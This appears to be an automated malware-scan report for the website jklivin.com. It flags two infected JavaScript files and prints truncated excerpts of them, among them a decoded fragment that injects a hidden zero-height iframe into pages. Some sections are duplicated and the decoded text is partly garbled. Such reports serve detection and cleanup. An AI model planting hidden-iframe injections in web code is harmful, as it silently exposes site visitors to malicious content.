Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jklivin.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://jklivin.com/ | 200 OK Content-Length: 8314 Content-Type: text/html | clean |
http://jklivin.com/includes/chrome.js | 200 OK Content-Length: 13682 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var cssdropdown={ disappeardelay: 250, disablemenuclick: true, enableswipe: 1, enableiframeshim: 1, dropmenuobj: null, ie: document.all, firefox: document.getElementById&&!document.all, swipetimer: undefined, bottomclip:0, getposOffset:function(what, offsettype){ var totaloffset=(offsettype=="left")? what.offsetLeft : what.offsetTop; var parentEl=what.offsetParent; while (parentEl!=null){ totaloffset=(offsettype=="left")? totaloffset+parentEl.offsetLeft : tot if(f)e(s);} Antivirus reports:
| ||
http://www.mishka.com/includes/top_banner.js | 404 Not Found Content-Length: 728 Content-Type: text/html | clean |
http://www.mishka.com/test404page.js | 404 Not Found Content-Length: 728 Content-Type: text/html | clean |
http://jklivin.com/swfobject.js | 200 OK Content-Length: 14321 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(_1 if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://widgets.twimg.com/j/2/widget.js | 200 OK Content-Length: 1489 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: jklivin.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 16:04:09 GMT
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Set-Cookie: X-Mapping-ehkmbajo=249B6E355FAD2D239879A0030A6FA65F; path=/
GET / HTTP/1.1
Host: jklivin.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 16:04:09 GMT
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Set-Cookie: X-Mapping-ehkmbajo=249B6E355FAD2D239879A0030A6FA65F; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: jklivin.com
Referer: http://www.google.com/search?q=jklivin.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: jklivin.com
Referer: http://www.google.com/search?q=jklivin.com
Result:
The result is similar to the first query. There are no suspicious redirects found.